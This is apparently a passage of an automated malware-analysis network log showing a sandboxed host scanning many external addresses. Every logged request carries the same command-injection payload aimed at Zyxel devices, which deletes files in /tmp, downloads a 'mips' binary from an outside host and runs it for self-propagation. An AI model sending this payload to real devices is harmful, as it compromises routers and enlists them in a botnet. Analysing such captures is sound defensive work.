                              Mar 31, 2024 08:41:57.198189020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7395192.168.2.1351162213.148.223.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198219061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7396192.168.2.1340232156.66.42.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198282003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7397192.168.2.1348298199.106.120.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198309898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7398192.168.2.1346318144.13.195.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198371887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7399192.168.2.1335564187.232.60.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198405981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7400192.168.2.1341818213.30.78.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198436022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7401192.168.2.135347059.56.34.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198484898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7402192.168.2.1334740116.241.69.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198523045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7403192.168.2.1345910116.250.74.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198545933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7404192.168.2.135961093.254.231.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198573112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7405192.168.2.1354600158.254.70.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198642015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7406192.168.2.1345162130.152.237.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198676109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7407192.168.2.134825032.138.100.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198717117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7408192.168.2.1341766182.87.128.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198779106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7409192.168.2.133625495.86.61.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198797941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7410192.168.2.134607065.115.43.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198841095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7411192.168.2.134705225.33.87.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198865891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7412192.168.2.135644057.126.39.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198909998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7413192.168.2.135343295.133.145.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198951006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7414192.168.2.1345030150.241.127.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.198982954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7415192.168.2.135111266.55.23.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199023962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7416192.168.2.1352944184.193.112.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199065924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7417192.168.2.133877877.227.155.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199104071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7418192.168.2.1352366143.8.202.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199141979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7419192.168.2.1348290204.227.231.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199172974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7420192.168.2.1341688205.25.228.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199212074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7421192.168.2.1356954149.108.195.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199242115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7422192.168.2.136023254.33.201.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199274063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7423192.168.2.133802673.154.101.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199304104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7424192.168.2.134121499.247.214.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199325085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7425192.168.2.13435149.191.201.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199362040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7426192.168.2.1334270117.60.13.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199414015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7427192.168.2.134437652.242.93.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199453115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7428192.168.2.1360336116.205.234.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199497938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7429192.168.2.133386066.192.8.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199527025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7430192.168.2.134300620.223.221.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.199568987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7431192.168.2.134844627.132.7.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.206826925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7432192.168.2.1339668195.142.242.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.206875086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7433192.168.2.135106676.61.30.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.206940889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7434192.168.2.1349052213.241.70.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:57.206971884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7435192.168.2.1350006147.188.252.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.215749979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7436192.168.2.1354374181.69.221.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.215802908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7437192.168.2.135352236.12.182.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.215873957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7438192.168.2.1360448208.135.62.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.215934038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7439192.168.2.1332934160.32.232.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.215998888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7440192.168.2.1350662153.22.216.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216067076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7441192.168.2.134223261.106.189.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216134071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7442192.168.2.1335886182.117.194.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216192961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7443192.168.2.135901482.245.205.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216289043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7444192.168.2.1351732183.214.137.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216346979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7445192.168.2.1357432160.130.5.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216403008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7446192.168.2.1342796191.49.194.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216489077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7447192.168.2.135437872.33.245.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216523886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7448192.168.2.1352898153.235.247.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216586113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7449192.168.2.1351952165.231.126.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216655970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7450192.168.2.134546451.150.36.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216725111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7451192.168.2.1346568155.66.151.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216799021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7452192.168.2.1335944109.127.67.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216860056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7453192.168.2.135326897.153.132.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216927052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7454192.168.2.135096613.80.34.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.216988087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7455192.168.2.135059483.111.87.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217065096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7456192.168.2.1343292183.156.7.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217116117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7457192.168.2.1354126137.94.192.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217181921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7458192.168.2.134353834.218.52.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217248917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7459192.168.2.1333710186.109.9.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217304945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7460192.168.2.133311876.108.165.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217339993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7461192.168.2.1352358125.237.39.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217411041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7462192.168.2.1358434138.9.146.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.217444897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7463192.168.2.1349178212.164.141.156443
                              TimestampBytes transferredDirectionData
